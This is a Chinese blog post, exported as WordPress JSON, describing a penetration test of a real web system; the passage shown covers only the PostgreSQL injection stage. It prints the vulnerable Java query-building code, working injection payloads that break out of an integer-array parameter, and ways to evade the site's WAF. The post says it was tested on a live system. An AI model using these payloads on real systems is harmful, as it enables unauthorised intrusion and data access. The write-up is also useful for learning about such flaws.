{"id":1757,"date":"2023-09-02T00:16:38","date_gmt":"2023-09-01T16:16:38","guid":{"rendered":"https:\/\/0.mnihyc.com\/blog\/?p=1757"},"modified":"2023-09-23T18:52:24","modified_gmt":"2023-09-23T10:52:24","slug":"%e4%b8%80%e4%b8%aa%e7%9c%9f%e5%ae%9e%e7%8e%af%e5%a2%83%e7%9a%84%e6%b8%97%e9%80%8f%e6%b5%8b%e8%af%95","status":"publish","type":"post","link":"https:\/\/0.mnihyc.com\/blog\/archives\/1757","title":{"rendered":"\u4e00\u4e2a\u771f\u5b9e\u73af\u5883\u7684XX\u7cfb\u7edf\u6e17\u900f\u6d4b\u8bd5"},"content":{"rendered":"<p><strong>\u514d\u8d23\u58f0\u660e<\/strong>\uff1a\u672c\u6d4b\u8bd5\u7684\u6240\u6709\u5185\u5bb9\u5747\u5728\u53ef\u63a7\u7684\u73af\u5883\u5185\u8fdb\u884c\uff0c\u672c\u6587\u7ae0\u4ec5\u4f9b\u4ea4\u6d41\u5b66\u4e60\uff0c\u8bf7\u4e8e\u67e5\u9605\u540e\u56db\u5341\u516b\u5c0f\u65f6\u5185\u4e3b\u52a8\u5fd8\u8bb0\u3002<\/p>\n<p>&nbsp;<\/p>\n<p><!--more--><\/p>\n<hr \/>\n<h2><strong>\u76ee\u5f55<\/strong><\/h2>\n<ol>\n<li style=\"list-style-type: none;\">\n<ol>\n<li>\n<h4>PostgreSQL \u6ce8\u5165<\/h4>\n<ul>\n<li>\n<h5><a href=\"#tag_pgsql_1\">\u521d\u51fa\u8305\u5e90<\/a><\/h5>\n<\/li>\n<li>\n<h5><a href=\"#tag_pgsql_2\">\u6e10\u5165\u4f73\u5883<\/a><\/h5>\n<\/li>\n<li>\n<h5><a href=\"#tag_pgsql_3\">\u67f3\u6697\u82b1\u660e<\/a><\/h5>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<h4>Vert.x \u5ba1\u8ba1<\/h4>\n<ul>\n<li>\n<h5><a href=\"#tag_vertx_1\">\u6709\u9650\u5236\u7684\u4efb\u610f\u4e0b\u8f7d<\/a><\/h5>\n<\/li>\n<li>\n<h5><a href=\"#tag_vertx_2\">\u6709\u9650\u5236\u7684\u4efb\u610f\u4e0a\u4f20<\/a><\/h5>\n<\/li>\n<li>\n<h5><a href=\"#tag_vertx_3\">\u4e8c\u91cd\u594f\u7684 RCE<\/a><\/h5>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<h4>\u5e55\u95f4<\/h4>\n<ul>\n<li>\n<h5><a href=\"#tag_3_ip\">IP \u98ce\u6ce2<\/a><\/h5>\n<\/li>\n<li>\n<h5><a href=\"#tag_3_msf\">Msf \u98ce\u6ce2<\/a><\/h5>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<h4>\u6a2a\u5411\u79fb\u52a8<\/h4>\n<ul>\n<li>\n<h5><a href=\"#tag_4_pvesc\">\u6f2b\u6f2b\u63d0\u6743\u8def<\/a><\/h5>\n<\/li>\n<li>\n<h5><a href=\"#tag_4_end\">\u5386\u7ecf\u8270\u96be\u7ec8\u6210\u5927\u4e1a<\/a><\/h5>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<h4>\u672a\u5b8c\u5f85\u7eed&#8230;&#8230;<\/h4>\n<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>\u524d\u8a00\uff1a\u672c\u4eba\u5728\u521a\u5165\u5b66\u7684\u51e0\u5929\u5c31\u5bf9\u6b64\u7cfb\u7edf\u505a\u4e86\u5145\u5206\u7684\u6d4b\u8bd5\uff0c\u800c\u8fd9\u4e24\u5e74\u95f4\u59cb\u7ec8\u672a\u80fd\u653b\u7834\uff1b\u76f4\u5230\u6700\u8fd1\u53d1\u73b0\u4e86\u539f\u4f5c\u8005\u5199\u8fc7\u7684\u4e00\u4e2a\u7c7b\u4f3c\u7684\u5957\u76ae\u9879\u76ee\uff0c\u624d\u7ec8\u4e8e\u5f97\u5230\u4e86\u6253\u5f00 RCE \u4e4b\u95e8\u7684\u90a3\u628a\u552f\u4e00\u7684\u94a5\u5319\u3002\u7531\u4e8e\u8fd9\u6837\u7684\u539f\u56e0\uff0c\u672c\u6587\u7ae0\u5c06\u504f\u5411\u4e8e\u590d\u73b0\u4e00\u4e2a\u5b8c\u6574\u7684\u6d4b\u8bd5\u8fc7\u7a0b\u3002\uff08\u4e0a\u9762\u7684\u76ee\u5f55\u4ec5\u4f9b\u53c2\u8003\uff09<\/p>\n<p>\u6ce8\u610f\uff1a\u672c\u6587\u4e2d\u51fa\u73b0\u7684\u6240\u6709 IP\u3001API Endpoint\u3001\u6570\u636e \u5747\u5df2\u4f5c\u6a21\u7cca\u5316\u5904\u7406\u3002\u6240\u6709\u4e1a\u52a1\u7a0b\u5e8f\u53ca\u6570\u636e\u5747\u672a\u88ab\u5927\u91cf\u8bfb\u53d6\u6216\u6076\u610f\u7be1\u6539\u3002<\/p>\n<p>\u5173\u952e\u8bcd\uff1a<span style=\"color: #ffffff;\">PostgreSQL \u76f2\u6ce8\uff1bPostgreSQL RCE\uff1bVert.x \u5ba1\u8ba1\uff1bJRE8 \u4efb\u610f\u5199 RCE\uff1bMeterpreter \u957f\u8fde\u63a5\uff1bOverlayFS \u6f0f\u6d1e CVE-2023-32629 \u63d0\u6743\uff1bRedis RCE<br \/>\n<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"tag_pgsql_1\"><\/a>\u00a0<\/p>\n<hr \/>\n<h4>PostgreSQL \u6ce8\u5165<\/h4>\n<ul>\n<li>\n<h5>\u521d\u51fa\u8305\u5e90<\/h5>\n<\/li>\n<\/ul>\n<p>\u867d\u7136\u73b0\u5728\u5df2\u7ecf\u4e0d\u662f\u62ff\u554aD\u626b\u5929\u4e0b\u7684\u65f6\u4ee3\u4e86\uff0c\u4f46\u9047\u5230\u4e2a\u7f51\u7ad9\u8fd8\u662f\u4f1a\u4e60\u60ef\u6027\u5730\u5f80\u53c2\u6570\u540e\u9762\u52a0\u4e0a\u5355\u5f15\u53f7\uff0c\u8bf4\u4e0d\u5b9a\u6709\u5947\u8ff9\u53d1\u751f\u5462\uff1f\u800c\u5bf9\u4e8e\u672c\u6b21\u7684XX\u7cfb\u7edf\uff0c\u5f88\u663e\u7136\u5b83\u5e76\u6ca1\u6709\u53d1\u751f\u3002\u8be5\u7cfb\u7edf\u7684\u524d\u540e\u7aef\u5747\u91c7\u7528 JSON \u5728 <code>\/api\/<\/code> \u5b50\u8def\u7531\u5904\u4ea4\u6362\u6570\u636e\uff0c\u4e14\u6240\u6709\u63d0\u4ea4\u7684\u5b57\u6bb5\u5747\u5177\u6709\u7c7b\u578b\u9a8c\u8bc1\uff0c\u5982 <code>\/api\/message\/5<\/code> \uff0c<code>{\"pid\": 3}<\/code>\uff0c\u7b49\uff0c\u9650\u5236\u4f20\u53c2\u4e3a int \u7c7b\u578b\uff0c\u65e0\u6cd5\u6ce8\u5165\u3002\u767b\u5f55 <code>\/api\/login<\/code> \u5904\u53d1\u73b0\u5b57\u7b26\u4e32\u5b57\u6bb5 <code>username<\/code> \u4f1a\u88ab\u5e26\u5165\u6570\u636e\u5e93\uff0c\u4f46\u65e0\u6cd5\u6ce8\u5165\uff0c\u8fd4\u56de\u7c7b\u578b\u53ea\u6709\uff1a\u767b\u9646\u6210\u529f\uff0c\u5bc6\u7801\u9519\u8bef\uff0c\u7528\u6237\u540d\u9519\u8bef\u4e09\u79cd\u3002<\/p>\n<p>\u5929\u65e0\u7edd\u4eba\u4e4b\u8def\uff0c\u53d1\u73b0\u4e86\u4e00\u4e2a\u6709\u610f\u601d\u7684\u63d0\u4ea4\u70b9 <code>\/api\/query<\/code>\uff0c\u5176\u6570\u636e\u4e3a <code>{\"points\": [1, 2, 3]}<\/code> \u3002\u8fd9\u91cc\u867d\u7136\u6709\u5bf9 <code>points<\/code> \u8fdb\u884c\u7c7b\u578b\u9a8c\u8bc1\uff0c\u4f46\u6570\u7ec4\u91cc\u9762\u53ef\u5c31\u4e0d\u4e00\u5b9a\u4e86\u3002\u8bd5\u7740\u6539\u6210 <code>{\"points\": [\"1, 2\", \"3\"]}<\/code> \uff0c\u7167\u6837\u6210\u529f\u63d0\u4ea4\uff0c\u4e14\u4e24\u79cd\u683c\u5f0f\u8fd4\u56de\u7684\u7ed3\u679c\u5177\u6709\u4e00\u81f4\u6027\u3002\u8fd9\u4e0d\u662f\u767d\u6765\u7684 SQL \u6ce8\u5165\u70b9\uff1f\u91cc\u9762\u52a0\u4e2a\u5355\u5f15\u53f7\uff0c\u8fd4\u56de\u503c\u53d8\u6210 <code>db exec error<\/code> \u4e86\uff0c\u867d\u7136\u6ca1\u6709\u62a5\u9519\u4fe1\u606f\uff0c\u4e5f\u4e0d\u77e5\u9053\u540e\u7aef\u7684\u6846\u67b6\uff0cDBMS\uff0c\u4f46\u4e0d\u5fc5\u60ca\u614c \u2014\u2014 \u76f4\u63a5\u4e0a sqlmap \u8dd1\u5b83\u7684\u3002\u4e24\u5e74\u524d\uff0csqlmap \u8fd8\u80fd\u987a\u5229\u8dd1\u5b8c\uff0c\u4f46\u9057\u61be\u7684\u662f\u5b83\u8bf4 not injectable \uff0c\u5f00 level 5 risk 3 \u4e5f\u662f\u4e00\u6837\u7684\u7ed3\u679c\u3002\u73b0\u5728\uff0csqlmap \u6ca1\u8dd1\u5230\u4e00\u534a\u5462\u90fd\u5c31\u88ab\u4e2d\u95f4\u4ef6 WAF \u62e6\u4e0b\u5927\u534a\u4e86\uff0c\u8fd8\u987a\u5e26 IP \u5c01\u7981\u5957\u9910\uff0c\u89e6\u53d1\u89c4\u5219\u5e73\u5747 30~90 \u79d2\u540e\u88ab\u5c01\u3002\u7528\u81ea\u52a8\u5316\u5de5\u5177\u57fa\u672c\u4e0a\u662f\u4e0d\u53ef\u80fd\u4e86\uff0c\u800c\u4e14\u4e5f\u6d4b\u4e0d\u51fa\u6765\u3002<\/p>\n<p>\u624b\u5de5\u6ce8\u5165\u561b\uff0c\u52c9\u4e3a\u5176\u96be\u5730\u731c\u4e00\u4e0b\uff0c\u4f30\u8ba1\u662f\u7c7b\u4f3c <code>','.join(points)<\/code> \u8fd9\u6837\u7684\u4e1c\u897f\uff0c\u7136\u540e\u5728 <code>WHERE point IN ()<\/code> \u91cc\u62fc\u63a5\uff0c\u90a3\u5c31\u7b80\u5355\u4e86\uff0c\u8bd5\u4e00\u4e2a <code>\") -- \"<\/code> \uff0c\u7136\u800c\u4f9d\u65e7 <code>db exec error<\/code>\u3002\u4e5f\u6709\u53ef\u80fd\u662f\u52a0\u4e86\u5f15\u53f7\uff1f\u4e0d\u53ef\u80fd\uff0c\u5426\u5219 <code>\"1, 2\"<\/code> \u4e0d\u53ef\u80fd\u6b63\u5e38\u6267\u884c\uff0c\u5c1d\u8bd5 <code>\"\\\"3\\\"\"<\/code> \u6b63\u5e38\uff0c\u800c <code>\"\\\"1, 2\\\"\"<\/code> \u62a5\u9519\uff0c\u8bc1\u660e\u6ca1\u6709\u5f15\u53f7\u3002\u4f46\u662f\u5982\u679c\u52a0 <code>\"'3'\"<\/code> \u7684\u8bdd\u5c31\u4f1a\u62a5\u9519\uff0c\u96be\u9053\u8fd8\u6709\u4ec0\u4e48 SQL \u652f\u6301\u53cc\u5f15\u53f7\uff0c\u4e0d\u652f\u6301\u5355\u5f15\u53f7\uff1f\uff1f\uff1f\u5148\u4e0d\u7ba1\u8fd9\u4e2a\u95ee\u9898\uff0c\u6709\u53ef\u80fd\u662f\u4e0d\u652f\u6301\u6ce8\u91ca\uff0c\u6216\u8005\u540e\u9762\u6709\u5176\u4ed6\u8bed\u53e5\uff1f\u90a3\u5c31\u95ed\u5408\u8bed\u53e5\uff0c\u8bd5\u4e00\u4e2a <code>\"1) OR 1 IN (1\"<\/code> \uff0c\u7167\u6837\u62a5\u9519\u3002\u8fd9\u65f6\u5019\u5df2\u7ecf\u5f00\u59cb\u6709\u4e9b\u7591\u60d1\u4e86\uff0c\u96be\u9053\u662f\u62c6\u6210 OR \u4e86\uff1f\u8bd5\u4e00\u4e2a <code>\"1 AND 1=0 \"<\/code>\uff0c\u8fd8\u662f\u62a5\u9519\u3002\u63a5\u7740\u5c1d\u8bd5\u4e86\u6240\u6709\u5e38\u89c1\u7684\u7ec4\u5408\uff0c\u95ed\u5408\u4e86\u6240\u6709\u7f51\u4e0a\u80fd\u641c\u5230\u7684 SELECT IN \u7684\u5199\u6cd5\uff0c\u4e5f\u8fdb\u884c\u4e86\u5f88\u591a\u5947\u5999\u7684 fuzz test\u3002\u5c31\u7b97\u5b83\u7528 Access \u4e5f\u4e0d\u5e94\u8be5\u5168\u662f <code>db exec error<\/code>\u3002\u4e00\u5ea6\u6000\u7591\u8fc7\u8fd9\u4e2a\u5730\u65b9\u5230\u5e95\u662f\u4e0d\u662f\u53ef\u6ce8\u5165\u7684\u3002<\/p>\n<p>\u5f53\u7136\uff0c\u719f\u6089 PostgreSQL \u7684\u670b\u53cb\u4eec\u5e94\u8be5\u80fd\u7acb\u523b\u8054\u60f3\u5230\u5176\u4ed6\u7684\u51e0\u79cd\u5199\u6cd5\uff0c\u4f46\u95ee\u9898\u662f\u6211\u4e0d\u592a\u719f 233\uff0c\u800c\u4e14\u6b64\u65f6\u4e5f\u6ca1\u6709\u5f97\u5230\u5173\u4e8e\u4efb\u4f55 DBMS \u7684\u4fe1\u606f\uff0c\u4e07\u4e00\u5b83\u8981\u662f Oracle DB \u7684\u8bdd\u5c31\u66f4\u65e0\u4ece\u4e0b\u624b\u4e86\u3002\u5c31\u8fd9\u6837\uff0c\u8fd9\u4e2a API endpoint \u4fdd\u6301\u53ea\u53ef\u8fdc\u89c2\u4e0d\u53ef\u4eb5\u73a9\u7684\u72b6\u6001\uff0c\u76f4\u5230\u6700\u8fd1\uff0c\u4e00\u573a\u5927\u96e8\u6539\u53d8\u4e86\u8fd9\u4e00\u5207\u3002<\/p>\n<p><a id=\"tag_pgsql_2\"><\/a>\u00a0<\/p>\n<ul>\n<li>\n<h5>\u6e10\u5165\u4f73\u5883<\/h5>\n<\/li>\n<\/ul>\n<p>\u901a\u5e38\u5bf9\u4e8e\u957f\u8fd9\u6837\u7684\u7cfb\u7edf\uff0c\u76f2\u731c vue\/react + nodejs + mysql \u662f\u5f88\u5408\u7406\u7684\uff0c\u57fa\u672c\u4e0a\u516b\u4e5d\u4e0d\u79bb\u5341\u3002\u540e\u6765\u8bc1\u660e\u4e86\u8fd9\u662f\u4e00\u4e2a\u5de8\u5927\u7684\u5931\u7b56\u3002\u9274\u4e8e\u4f5c\u8005\u5728\u9875\u9762\u6700\u5e95\u4e0b\u7559\u4e86\u7248\u6743\u4fe1\u606f\uff0c\u81ea\u7136\u662f\u5f97\u8fdb\u4ed6\u4eec\u7684 GitHub \u4e3b\u9875\u53c2\u89c2\u53c2\u89c2\u3002\u5927\u81f4\u626b\u4e86\u4e00\u773c\uff0cfork \u7684\u4e0d\u770b\uff0c\u8ddf js \u76f8\u5173\u7684\u91cd\u70b9\u770b\uff0c\u7136\u800c\u5e76\u6ca1\u6709\u53d1\u73b0\u4ec0\u4e48\u6709\u4ef7\u503c\u7684\u4e1c\u897f\u3002\u76f4\u5230\u524d\u51e0\u5929\u3002\u7a81\u7136\u60f3\u770b\u770b\u5b66\u957f\u4eec\u5199\u7684\u8bfe\u8bbe\u957f\u5565\u6837\uff0c\u5c31\u6bcf\u4e2a\u9879\u76ee\u70b9\u8fdb\u53bb\u90fd\u626b\u4e00\u904d\u3002\u5176\u4e2d\u6709\u4e00\u4e2a\u53eb\u201c\u6bd5\u4e1a\u8bbe\u8ba1\uff08\u4ee3\u5199\u7248\uff09\u201d\uff0cJava \u5199\u7684\uff0c\u60f3\u7740\u770b\u770b\u4e3b\u8def\u7531\u5b8c\u4e8b\uff0c\u7ed3\u679c\u76f4\u63a5\u9707\u60ca\u4e00\u767e\u5e74\uff1a\u548b\u957f\u5f97\u8fd9\u4e48\u50cf\u5462\uff1f\u90a3\u719f\u6089\u7684 <code>\/api\/<\/code> endpoint\uff0c\u719f\u6089\u7684\u5168 json \u4f20\u53c2\uff0c\u5fc3\u60f3\uff0c\u4e0d\u4f1a\u5427\uff1f\u786e\u4fe1\u5ea6 20%\u3002<\/p>\n<p>\u6765\u5230\u9274\u6743\u8def\u7531\uff0c\u4e00\u770b\u662f\u83b7\u53d6\u5728 json body \u91cc\u7684 token \u5b57\u6bb5\uff0c\u4e14\u7ecf\u8fc7 AES + BASE64 \u52a0\u5bc6\uff0c\u7b80\u76f4\u5b8c\u5168\u4e00\u6837\uff01\u786e\u4fe1\u5ea6 50%\u3002\u4f46\u8fd9\u4e5f\u53ea\u80fd\u8868\u660e\u4f5c\u8005\u7684\u6784\u67b6\u504f\u597d\uff0c\u4e0d\u80fd\u76f4\u63a5\u8bc1\u660e\u4f7f\u7528\u6846\u67b6\u7684\u76f8\u5173\u6027\u3002Vert.x\uff0c\u4e0d\u600e\u4e48\u542c\u8bf4\u8fc7\u3002\u6ca1\u53d1\u73b0\u4ec0\u4e48\u73b0\u6210\u7684\u6d1e\u3002\u53d1\u52a8\u6280\u80fd\uff1a\u5947\u6280\u6deb\u5de7\uff1b\u641c\u7d22 404 \u754c\u9762\u5185\u5bb9\uff0c\u7ed3\u679c\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1767\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result.png\" alt=\"\" width=\"899\" height=\"774\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result.png 899w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result-300x258.png 300w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result-150x129.png 150w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result-768x661.png 768w\" sizes=\"auto, (max-width: 899px) 100vw, 899px\" \/><\/p>\n<p>\u8fd8\u771f\u641c\u5230\u4e86\u3002\u3002\u3002\u8fd9\u4e0b\u53ef\u4ee5 100% \u786e\u8ba4\u540e\u7aef\u4f7f\u7528\u7684\u662f Vert.x\uff0c\u7adf\u7136\u662f Java\uff0c\u60f3\u90fd\u6ca1\u60f3\u8fc7\uff0c\u9690\u85cf\u5f97\u592a\u6df1\u3002\u6700\u540e\u518d\u786e\u8ba4\u4e00\u4e0b\uff0c\u76f4\u63a5\u8bbf\u95ee <code>\/api\/<\/code> \u4f1a\u51fa\u4e00\u6bb5\u63d0\u793a\u4fe1\u606f\uff0c&#8221;Hello from api endpoint. You should normally not see this.&#8221;\uff0c\u8ddf\u201c\u6bd5\u4e1a\u8bbe\u8ba1\uff08\u4ee3\u5199\u7248\uff09\u201d\u6709 99% \u7684\u91cd\u5408\u5ea6\uff0c\u8fd9\u4e0b\u53ef\u4ee5\u653e\u5fc3\u4e86\u3002\u867d\u7136 endpoint \u957f\u5f97\u4e0d\u592a\u4e00\u6837\uff0c\u4f46\u6838\u5fc3\u4ee3\u7801\u7684\u91cd\u5408\u5ea6\u80af\u5b9a\u662f\u5f88\u9ad8\u7684\u3002\u8fd9\u4e0b\u597d\u4e86\uff0c\u9ed1\u76d2\u53d8\u767d\u76d2\uff0c\u76f4\u63a5\u5f00\u5ba1\u3002<\/p>\n<p>\u770b\u6e90\u4ee3\u7801\u53d1\u73b0\uff0c\u4f20\u53c2\u4f7f\u7528\u7684\u662f\u00a0<code>io.vertx.core.json.JsonObject<\/code> \uff0c\u8c03\u7528\u6700\u591a\u7684\u5c31\u662f <code>param.getInteger()<\/code>\uff0c\u4e14\u767b\u9646\u8def\u7531\u4f7f\u7528 <code>io.reactiverse.reactivex.pgclient.PgConnection<\/code>\u00a0\u7684 <code>rxPreparedQuery()<\/code> \u6267\u884c SQL\uff0c\u8fd9\u4e2a PreparedStatement \u5c31\u522b\u60f3\u6ce8\u5165\u4e86\uff0c\u8ddf\u9884\u671f\u4e00\u6837\u3002\u91cd\u8981\u7684\u662f\u4f20\u5165 JSON \u6570\u7ec4\u7684\u5730\u65b9\uff0c\u4ec0\u4e48\u4e2a\u6d41\u7a0b\uff1f\u5b9a\u4f4d\u5230\u76f8\u5173\u4ee3\u7801\uff1a<\/p>\n<pre class=\"lang:java decode:true \">\/\/ @RoutingContext\r\n\r\n\/\/ io.vertx.core.json.JsonObject\r\nJsonObject data = new JsonObject()\r\n    .put(\"kid\", param.getInteger(\"kid\"))\r\n    .put(\"contain\",\r\n        param.getJsonArray(\"contain\", new JsonArray().add(-1)));\r\n\r\n\/\/ io.reactiverse.reactivex.pgclient.Tuple\r\nTuple tuple = Tuple.of(Database.fromQueryString(Integer.toString(data.getInteger(\"kid\"))),\r\n                Database.fromQueryString(data.getJsonArray(\"contain\")));\r\n\r\nString sql = Database.generatePreparedQuery(SEARCH_SQL, tuple);\r\n\r\n\/\/ io.reactiverse.reactivex.pgclient.PgConnection\r\nconn.rxQuery(sql);<\/pre>\n<p>\u7ee7\u7eed\u8ddf\u8fdb Database \u76f8\u5173\u51fd\u6570\uff1a<\/p>\n<pre class=\"lang:java decode:true \">public static String formQueryString(JsonArray dataArray) {\r\n    String encodedData = dataArray.encode();\r\n    return encodedData.replace(\"[\", \"'{\").replace(\"]\", \"}'\");\r\n}\r\n\r\npublic static String formQueryString(String queryStr) {\r\n    return new StringBuilder().append(\"'%\").append(queryStr).append(\"%'\").toString();\r\n}\r\n\r\npublic static String generatePreparedQuery(String sqlStatement, Tuple tupleObj) {\r\n    String sanitizedSQL = sqlStatement.replaceAll(\"\\r\\n\", \" \").replaceAll(\"\\n\", \" \");\r\n    int tupleLength = tupleObj.size();\r\n    for (int i = 0; i &lt; tupleLength; i++) {\r\n        String replacement = Integer.toString(i + 1);\r\n        String value = tupleObj.getValue(i).toString();\r\n        sanitizedSQL = sanitizedSQL.replace(\"$\" + replacement, value);\r\n    }\r\n    return sanitizedSQL;\r\n}\r\n<\/pre>\n<p>\u8fd9\u4e0bBBQ\u4e86\uff0c\u76f4\u63a5\u62fc\u8fdb\u53bb\uff0c\u4e5f\u5c31\u9020\u6210\u4e86 SQL \u6ce8\u5165\u7684\u53ef\u80fd\u3002\u4e0d\u8fc7\u53c2\u6570\u770b\u7740\u6709\u4e9b\u964c\u751f\uff0c\u4ece\u8fd9\u91cc\u5f00\u59cb\u5165\u5751 PostgreSQL\uff1a\u628a <code>JSONArray<\/code> \u7ed9 <code>encode()<\/code> \u5b8c\u53d8\u6210 <code>[\"1, 2\", \"3\"]<\/code> \uff0c\u7136\u540e\u8fdb\u884c\u4e00\u6ce2\u5947\u5999\u7684\u66ff\u6362\u53d8\u6210 <code>'{\"1, 2\", \"3\"}'<\/code> \u76f4\u63a5\u62fc\u8fdb SQL \u8bed\u53e5\u91cc\u3002\u548b\u56de\u4e8b\u634f\uff1f\u5148\u770b\u770b SEARCH_SQL \u662f\u5565\uff1a<\/p>\n<pre class=\"lang:pgsql decode:true \">select * from search_content_kid($1, $2);<\/pre>\n<p>\u7adf\u7136\u662f\u4e2a\u51fd\u6570\u3002\u3002\u3002\u4ece\u4e00\u5f00\u59cb\u5927\u65b9\u5411\u5c31\u8d70\u9519\u4e86\u3002\u770b\u770b\u5185\u5bb9\uff1a<\/p>\n<pre class=\"lang:pgsql decode:true \">CREATE FUNCTION public.search_content_kid(c_kid integer, c_content integer[]) RETURNS SETOF public.\"krcp\"\r\n    LANGUAGE plpgsql\r\n    AS $$\r\nDECLARE\r\n\r\nBEGIN\r\n    BEGIN\r\n        if -1 = any (c_content) Then\r\n            RETURN Query select * from \"krcp\" where kid = c_kid;\r\n        else\r\n            RETURN Query select * from \"krcp\" where kid = any (c_content);\r\n        end if;\r\n    END;\r\nEND ;\r\n$$;<\/pre>\n<p>plpgsql \u51fd\u6570\u91cc\u9762\u7684\u8fd9\u4e2a select \u662f\u4e0d\u53ef\u6ce8\u5165\u7684\u3002\u6240\u4ee5\u76ee\u6807\u5f88\u660e\u786e\uff0c\u63a7\u5236\u539f select \u7684\u6d41\u7a0b\u3002\u7531\u4e8e PostgreSQL \u9ed8\u8ba4\u652f\u6301 stacked queries\uff0c\u76f4\u63a5\u95ed\u5408\u8fd9\u4e2a\u51fd\u6570\uff0c\u4f20 <code>\"}'); -- \"<\/code>\uff0c\u7136\u540e\u8fd8\u662f\u719f\u6089\u7684 <code>db exec error<\/code> \u3002\u3002\u3002\u53ef\u80fd\u662f\u53c2\u6570\u7684\u4f4d\u7f6e\u4e0d\u5bf9\uff1f\u539f\u6765\u4e0d\u662f\u53ea\u6709\u4e00\u4e2a points \u5417\u3002\u3002\u3002\u7136\u540e\u60f3\u8d77\u4e4b\u524d fuzz test \u65f6\u7684\u5355\u53cc\u5f15\u53f7\u95ee\u9898\uff0c\u5355\u5f15\u53f7\u7684\u95ee\u9898\u5f97\u5230\u4e86\u5408\u7406\u7684\u89e3\u91ca\uff0c\u800cXX\u7cfb\u7edf\u4e2d\u7531 <code>JSONArray<\/code> \u800c\u6765\u7684\u5b57\u7b26\u4e32\u662f\u4e0d\u81ea\u5e26\u53cc\u5f15\u53f7\u7684\u3002\u4e0e\u8fd9\u91cc\u7684\u4ee3\u7801\u5b58\u5728\u4e00\u5b9a\u5dee\u5f02\u3002\u859b\u5b9a\u8c14\u7684\u76d2\u6d4b\u8bd5\u3002\u4e5f\u5c1d\u8bd5\u5728\u540e\u9762\u8865\u4e0d\u540c\u4e2a\u6570\u7c7b\u578b\u7684\u5176\u4ed6\u53c2\u6570\uff0c\u4ecd\u7136\u65e0\u6d4e\u4e8e\u4e8b\u3002\u5f53\u52a1\u4e4b\u6025\u662f\u8981\u786e\u8ba4XX\u7cfb\u7edf\u91cc\u5230\u5e95\u662f\u4e0d\u662f\u8fd9\u4e48\u5199\u7684\uff0c\u4e8e\u662f\u53ea\u80fd\u5c1d\u8bd5\u95ed\u5408 <code>\"'{}'\"<\/code>\uff0c\u4f7f\u51fd\u6570\u4ecd\u7136\u6b63\u5e38\u8c03\u7528\u3002<\/p>\n<p>\u5373\u4f7f\u4e0d\u719f\u6089 pgSQL \u4e5f\u5e94\u8be5\u731c\u5230\u4e86\uff0c<code>\"'{}'\"<\/code> \u8fd9\u662f\u6570\u7ec4\u7684\u5199\u6cd5\u3002pgSQL \u91cc\u51fd\u6570\u7684\u8c03\u7528\u5b58\u5728\u7c7b\u578b\u68c0\u67e5\uff0c\u5fc5\u987b\u4fdd\u6301\u63d2\u5165 payload \u540e\u8be5\u5904\u53c2\u6570\u7684\u7c7b\u578b\u4ecd\u4e3a <code>integer[]<\/code>\u3002\u5f00\u59cb\u5c1d\u8bd5\uff1a<\/p>\n<pre class=\"lang:pgsql decode:true \">CREATE OR REPLACE FUNCTION public.func(ints integer[]) RETURNS SETOF int[] LANGUAGE plpgsql AS $$ DECLARE BEGIN RETURN QUERY select ints; END $$;\r\n\r\n-- PASS: 1,2,3\r\nselect func('{1, 2, \"3\"}');\r\n\r\n-- ERROR: function func(text) does not exist\r\nselect func('{1, 2}' || '{2, 3}');\r\n\r\n-- ERROR: function func(text) does not exist\r\nselect func('{1, 2' || '2, 3}');\r\n\r\n-- PASS: 1,22,3\r\nselect func(('{1, 2' || '2, 3}')::int[]);\r\n\r\n-- PASS: 1,2,2,3,3,4\r\nselect func('{1, 2}'::int[] || '{2, 3}' || '{3, 4}');<\/pre>\n<p>\u53ef\u4ee5\u53d1\u73b0\uff0c\u82e5\u662f\u5355\u4e2a string\uff0cpgSQL \u53ef\u4ee5\u5c06\u5176\u9690\u5f0f\u8f6c\u81f3\u6570\u7ec4\u7c7b\u578b\uff1b\u800c\u4f7f\u7528 <code>||<\/code> \u8fd0\u7b97\u7b26\u5219\u9ed8\u8ba4\u5408\u5e76\u7684\u662f\u5b57\u7b26\u4e32\uff0c\u7531\u4e8e\u4ece\u5de6\u5f80\u53f3\u8fd0\u7b97\uff0c\u4ec5\u9700\u4fdd\u8bc1\u5de6\u8fb9\u51fa\u73b0\u4e00\u4e2a\u6570\u7ec4\u5373\u53ef\u3002\u7acb\u9a6c\u6784\u9020\u4e00\u4e2a <code>\"1}'::int[] || '{1\"<\/code>\uff0c\u7ec8\u4e8e\uff0c\u4e0d\u662f <code>db exec error<\/code>\uff0c\u6b63\u5e38\u5730\u67e5\u8be2\u51fa\u4e86\u7ed3\u679c\uff0c\u8bf4\u660e\u8d70\u5728\u4e00\u6761\u5eb7\u5e84\u5927\u9053\u4e0a\uff01\uff01<\/p>\n<p>\u7acb\u9a6c\u8bd5\u4e00\u4e2a <code>pg_sleep()<\/code> \uff0c\u7136\u540e\u53d1\u73b0\u88ab\u4e2d\u95f4\u4ef6 WAF \u62e6\u4e0b\u6765\u4e86\u3002\u3002\u3002\u8bc6\u522b\u7684\u662f\u8001\u8001\u5b9e\u5b9e\u7684 pg_sleep \u8fd9\u51e0\u4e2a\u5b57\u7b26\uff0c\u5305\u62ec\u5927\u5c0f\u5199\uff0cJSON \u7684 \\u \u89e3\u7801\u4e5f\u7ed9\u5b83\u505a\u4e0a\u4e86\uff0c\u96be\u4ee5\u7ed5\u8fc7\u3002\u3002\u3002\u4e0d\u8fc7\u5e78\u597d pgSQL \u63d0\u4f9b\u4e86\u65b9\u4fbf\u7684 <code>query_to_xml()<\/code> \u51fd\u6570\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u5b57\u7b26\u4e32\u5b58\u50a8\u7684 SELECT 